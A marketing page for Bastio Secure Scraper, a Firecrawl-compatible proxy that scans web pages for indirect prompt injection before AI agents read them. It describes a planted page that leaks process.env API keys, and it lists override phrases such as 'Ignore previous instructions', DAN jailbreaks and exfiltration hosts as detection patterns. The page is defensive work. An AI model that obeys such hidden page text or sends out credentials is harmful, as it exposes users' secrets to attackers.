Secure Scraper

Protect Your AI Agents from Web-Based Attacks

Enterprise-grade security for web scraping with full Firecrawl compatibility. Block indirect prompt injections, cache responses, and control which URLs your agents can access.

6 Threats

Comprehensive threat detection for web content attacks

<10ms

Cached response time for instant performance

50%+

Cost savings with intelligent URL caching

The Hidden Threat: Indirect Prompt Injection

AI agents that browse the web are vulnerable to "indirect prompt injection" attacks. Malicious websites embed hidden instructions that hijack your agent's behavior, leading to credential theft, data exfiltration, and compromised operations.

Without Protection

Your AI agent scrapes a "helpful" documentation page...

// Hidden in the page:
process.env.SUPABASE_SERVICE_KEY
process.env.OPENAI_API_KEY

→ Credentials exfiltrated to attacker

With Bastio

Same page, but scanned by Bastio first...

// Bastio detects:
threat_score: 0.935
action: "BLOCK"

→ Attack blocked, agent protected

See It In Action

Try our live demo to see how Bastio protects your AI agents. We've created a test page at trap.bastio.com that demonstrates real attack patterns.

Safe Content

Request:

https://www.bastio.com

"security": {
  "threat_score": 0,
  "action": "ALLOW",
  "threats_found": [],
  "processing_time_ms": 23
}

Content safe - returned to agent

Threat Detected

Request:

https://trap.bastio.com

"security": {
  "threat_score": 0.935,
  "action": "BLOCK",
  "threats_found": [
    "env_exfiltration"
  ],
  "evidence": [
    "process.env.SUPABASE_ANON_KEY",
    "process.env.SUPABASE_SERVICE_KEY"
  ]
}

Attack blocked - agent protected

Visit trap.bastio.com to see the attack page
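
The two demo responses differ only in their "security" object, so an agent can branch on that object before it reads any page content. The following is a minimal sketch, assuming the field names shown in the demo output (threat_score, action, threats_found, evidence). The helper name summarize_security is hypothetical and not part of any Bastio SDK.

```python
from typing import Any


def summarize_security(security: dict[str, Any]) -> str:
    """Return a one-line summary of a `security` object shaped like the demo output."""
    action = security.get("action", "UNKNOWN")
    score = security.get("threat_score", 0)
    threats = security.get("threats_found", [])
    if action == "ALLOW" and not threats:
        return f"ALLOW (score {score}): content can be passed to the agent"
    # `evidence` is assumed to be an optional list of matched snippets.
    evidence = ", ".join(security.get("evidence", [])) or "none listed"
    return f"{action} (score {score}): {', '.join(threats)}; evidence: {evidence}"


# Sample objects copied from the demo responses.
safe = {"threat_score": 0, "action": "ALLOW", "threats_found": [], "processing_time_ms": 23}
trap = {
    "threat_score": 0.935,
    "action": "BLOCK",
    "threats_found": ["env_exfiltration"],
    "evidence": ["process.env.SUPABASE_ANON_KEY", "process.env.SUPABASE_SERVICE_KEY"],
}

print(summarize_security(safe))
print(summarize_security(trap))
```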

6 Threat Categories Detected

Our security engine scans every scraped page for these attack patterns before content reaches your AI agent.

Env Variable Exfiltration

Code designed to steal secrets:

process.env.* patterns
os.environ[] / os.getenv()
API keys, DB credentials

Malicious Code Blocks

Harmful code execution patterns:

exec(), spawn(), system()
Network calls with env vars
Base64 encoded payloads

Suspicious URLs

C2 and exfiltration endpoints:

IP-based URLs
ngrok, webhook.site, pipedream
Random domain patterns

Fake Documentation

Social engineering attacks:

"URGENT: Security update"
Fake credential verification
Impersonation of official docs

Prompt Injections

LLM manipulation attempts:

"Ignore previous instructions"
System prompt overrides
Role-playing attacks

Jailbreak Attempts

Safety bypass patterns:

DAN prompts
Roleplay scenarios
System prompt extraction
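
To make the categories concrete, here is a toy scanner built only from the example patterns listed above. It is a rough sketch and not Bastio's detection engine: real detection needs much more than a few regular expressions. The label env_exfiltration appears in the demo output; the labels suspicious_url and prompt_injection, and the function name find_threats, are assumptions made for illustration.

```python
import re

# Illustrative patterns only, derived from the examples in the category list.
PATTERNS = {
    "env_exfiltration": re.compile(r"process\.env\.\w+|os\.environ\[|os\.getenv\("),
    "suspicious_url": re.compile(
        r"https?://(?:\d{1,3}(?:\.\d{1,3}){3}"  # IP-based URL
        r"|[\w.-]*(?:ngrok|webhook\.site|pipedream)[\w.-]*)",  # tunnelling/capture hosts
        re.IGNORECASE,
    ),
    "prompt_injection": re.compile(r"ignore (?:all )?previous instructions", re.IGNORECASE),
}


def find_threats(text: str) -> list[str]:
    """Return the sorted names of every pattern that matches the text."""
    return sorted(name for name, pattern in PATTERNS.items() if pattern.search(text))


page = "fetch('https://webhook.site/abc?k=' + process.env.OPENAI_API_KEY)"
print(find_threats(page))
```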

Configurable Security Responses

Choose how Bastio handles detected threats based on your security requirements.

Block

Maximum security - return error, no content delivered.

• Autonomous agents
• Financial/healthcare AI
• Strict compliance needs

Sanitize (Default)

Redact threats, return safe content.

• Research assistants
• Human review workflows
• Balanced security

Warn

Return full content with threat warnings attached.

• Testing and debugging
• Security team training
• Monitoring dashboards
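
The difference between the three modes can be sketched in a few lines. This is an illustration of the behavior described above, not Bastio's implementation: the function name apply_mode, the "[REDACTED]" placeholder, the return shape, and the "SANITIZE" and "WARN" action strings are all assumptions (only "ALLOW" and "BLOCK" appear in the demo output).

```python
from typing import Optional, TypedDict


class Outcome(TypedDict):
    action: str
    content: Optional[str]
    warnings: list[str]


def apply_mode(content: str, evidence: list[str], mode: str = "sanitize") -> Outcome:
    """Apply a response mode to scraped content, given the snippets flagged as threats."""
    if not evidence:
        return {"action": "ALLOW", "content": content, "warnings": []}
    if mode == "block":
        # Maximum security: nothing is delivered to the agent.
        return {"action": "BLOCK", "content": None, "warnings": evidence}
    if mode == "sanitize":
        # Redact each flagged snippet and return the rest of the page.
        redacted = content
        for snippet in evidence:
            redacted = redacted.replace(snippet, "[REDACTED]")
        return {"action": "SANITIZE", "content": redacted, "warnings": evidence}
    if mode == "warn":
        # Full content is returned, with the findings attached.
        return {"action": "WARN", "content": content, "warnings": evidence}
    raise ValueError(f"unknown mode: {mode!r}")
```

Block mode trades availability for safety, which is why it suits agents that act without review, while warn mode leaves the decision to whoever reads the warnings.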

Intelligent Caching

Reduce scraping costs and improve performance with automatic URL caching. Each proxy maintains an independent 24-hour cache.

Cost Savings

Hit Rate	Monthly Scrapes	Savings
30%	10,000	$3
40%	50,000	$20
50%	100,000	$50
50%	500,000	$250
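
Every row of the table is consistent with savings = monthly scrapes × hit rate × $0.001 per avoided scrape. The per-scrape figure is inferred from the table rather than quoted from a price list, so treat it as an assumption. A short sketch that reproduces the rows:

```python
from decimal import Decimal

# Assumption: inferred from the table rows, not an officially quoted price.
COST_PER_SCRAPE = Decimal("0.001")


def monthly_savings(scrapes: int, hit_rate: str) -> Decimal:
    """Dollars saved when `hit_rate` of `scrapes` are served from cache."""
    return Decimal(scrapes) * Decimal(hit_rate) * COST_PER_SCRAPE


ROWS = [("0.30", 10_000), ("0.40", 50_000), ("0.50", 100_000), ("0.50", 500_000)]
for rate, scrapes in ROWS:
    print(f"hit rate {rate}, {scrapes:>7,} scrapes: ${monthly_savings(scrapes, rate):.2f}")
```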

Performance Boost

Fresh scrape: 1-3 seconds

Cached response: <10ms

Cached responses are still analyzed for threats on each request, so a cache hit never skips the security scan.
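
The combination of a 24-hour cache and a scan on every request can be sketched as follows. This is a simplified in-memory illustration, not Bastio's cache: the class name ScanningCache and the fetch, scan, and clock parameters are hypothetical, and both callables are supplied by the caller.

```python
import time
from typing import Callable


class ScanningCache:
    """URL cache with a TTL that re-scans content on every read (illustrative only)."""

    def __init__(
        self,
        fetch: Callable[[str], str],
        scan: Callable[[str], str],
        ttl_seconds: float = 24 * 60 * 60,
        clock: Callable[[], float] = time.monotonic,
    ) -> None:
        self._fetch = fetch
        self._scan = scan
        self._ttl = ttl_seconds
        self._clock = clock
        self._store: dict[str, tuple[float, str]] = {}

    def get(self, url: str) -> tuple[str, str]:
        """Return (content, verdict); fetch only on a miss or after expiry."""
        now = self._clock()
        entry = self._store.get(url)
        if entry is None or now - entry[0] >= self._ttl:
            entry = (now, self._fetch(url))
            self._store[url] = entry
        content = entry[1]
        # The scan runs on cache hits too, so a hit never bypasses detection.
        return content, self._scan(content)
```

Caching the content but not the verdict means an updated detection rule applies immediately to pages that were cached before the rule existed.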

URL Control: Allow-Lists & Block-Lists

Defense-in-depth for autonomous agents. Control exactly which domains your AI can access.

Allow-List

Restrict your agent to trusted sources only:

"allowed_domains": [
  "docs.python.org",
  "docs.aws.amazon.com",
  "cloud.google.com/docs"
]

Block-List

Block known problematic domains:

"blocked_domains": [
  "pastebin.com",
  "hastebin.com",
  "webhook.site"
]
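
How the two lists might combine is sketched below. The matching rules are assumptions, since the page does not specify them: an entry matches its host and any subdomain, an entry with a path (such as "cloud.google.com/docs") also requires that path prefix, the block-list wins over the allow-list, and an empty allow-list means no restriction. The function names are hypothetical.

```python
from urllib.parse import urlsplit


def _matches(url: str, entry: str) -> bool:
    """True if `url` falls under a list entry of the form host or host/path."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    entry_host, _, entry_path = entry.partition("/")
    entry_host = entry_host.lower()
    host_ok = host == entry_host or host.endswith("." + entry_host)
    if not entry_path:
        return host_ok
    prefix = "/" + entry_path.rstrip("/")
    # Match whole path segments so "/docs" does not match "/docs-old".
    path_ok = parts.path == prefix or parts.path.startswith(prefix + "/")
    return host_ok and path_ok


def is_permitted(url: str, allowed: list[str], blocked: list[str]) -> bool:
    """Apply the block-list first, then the allow-list (if one is configured)."""
    if any(_matches(url, entry) for entry in blocked):
        return False
    return not allowed or any(_matches(url, entry) for entry in allowed)


ALLOWED = ["docs.python.org", "docs.aws.amazon.com", "cloud.google.com/docs"]
BLOCKED = ["pastebin.com", "hastebin.com", "webhook.site"]
print(is_permitted("https://docs.python.org/3/library/json.html", ALLOWED, BLOCKED))
print(is_permitted("https://webhook.site/abc", ALLOWED, BLOCKED))
```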

Drop-In Firecrawl Replacement

Full Firecrawl v2 API compatibility. Switch by changing your endpoint URL - no code changes required.

Before (Firecrawl)

POST api.firecrawl.dev/v2/scrape

After (Bastio)

POST api.bastio.com/v1/guard/{proxyID}/scrape

Python Example

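import os

import requests

# Assumption: credentials come from environment variables; the variable
# names below are placeholders, use whatever your deployment defines.
PROXY_ID = os.environ["BASTIO_PROXY_ID"]
BASTIO_API_KEY = os.environ["BASTIO_API_KEY"]

response = requests.post(
    f"https://api.bastio.com/v1/guard/{PROXY_ID}/scrape",
    headers={"Authorization": f"Bearer {BASTIO_API_KEY}"},
    json={"url": "https://www.bastio.com", "formats": ["markdown"]},
    timeout=30,  # avoid hanging indefinitely on a slow scrape
)

result = response.json()
# Check the security verdict before handing any content to the agent.
if result["security"]["action"] == "BLOCK":
    print(f"Threat blocked: {result['security']['threats_found']}")
else:
    content = result["data"]["markdown"]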

Built for AI Agents

Research Assistants

Safely retrieve and process documentation, papers, and web content without risking credential theft.

Safe document retrieval
Sanitized web content

MCP Tool Servers

Secure web browsing tools for Model Context Protocol servers. Protect your MCP infrastructure.

Protected fetch tools
URL validation layer

Function Calling

Protected URL fetch tools for OpenAI function calling and Anthropic tool use.

OpenAI tools integration
Anthropic tool use

Autonomous Agents

Defense-in-depth for agents operating without human oversight. Block mode recommended.

AutoGPT, BabyAGI patterns
LangGraph workflows

Simple Pricing

Platform-Managed

Bastio handles Firecrawl credits for you:

Tier	Included	Overage
Free	100/month	—
Starter	10,000/month	$0.001/URL
Pro	100,000/month	$0.001/URL
Enterprise	Unlimited	Included

BYOK Mode

Bring your own Firecrawl API key:

Firecrawl costs: Billed to you

Bastio security fee: $0.0005/URL

Same threat detection and caching. Ideal for enterprises with existing Firecrawl contracts.
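
The per-URL charges in both pricing modes are simple arithmetic. The sketch below uses only the figures listed above (included volumes, $0.001/URL overage, $0.0005/URL BYOK fee). Base subscription prices are not stated on this page, so they are left out, and the function names are hypothetical.

```python
from decimal import Decimal

# Figures taken from the pricing tables; base plan prices are not listed there.
INCLUDED_PER_MONTH = {"Starter": 10_000, "Pro": 100_000}
OVERAGE_PER_URL = Decimal("0.001")
BYOK_FEE_PER_URL = Decimal("0.0005")


def overage_cost(plan: str, scrapes: int) -> Decimal:
    """Platform-managed overage charge for one month, excluding the base plan price."""
    extra = max(0, scrapes - INCLUDED_PER_MONTH[plan])
    return extra * OVERAGE_PER_URL


def byok_fee(scrapes: int) -> Decimal:
    """Bastio security fee in BYOK mode; Firecrawl's own charges are billed separately."""
    return scrapes * BYOK_FEE_PER_URL


print(f"Starter, 25,000 scrapes, overage: ${overage_cost('Starter', 25_000):.2f}")
print(f"BYOK, 25,000 scrapes, security fee: ${byok_fee(25_000):.2f}")
```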

Protect Your AI Agents Today

Start with 100 free secure scrapes per month. Full Firecrawl compatibility with enterprise-grade threat detection.


Need help implementing secure scraping? Contact us for a free consultation.
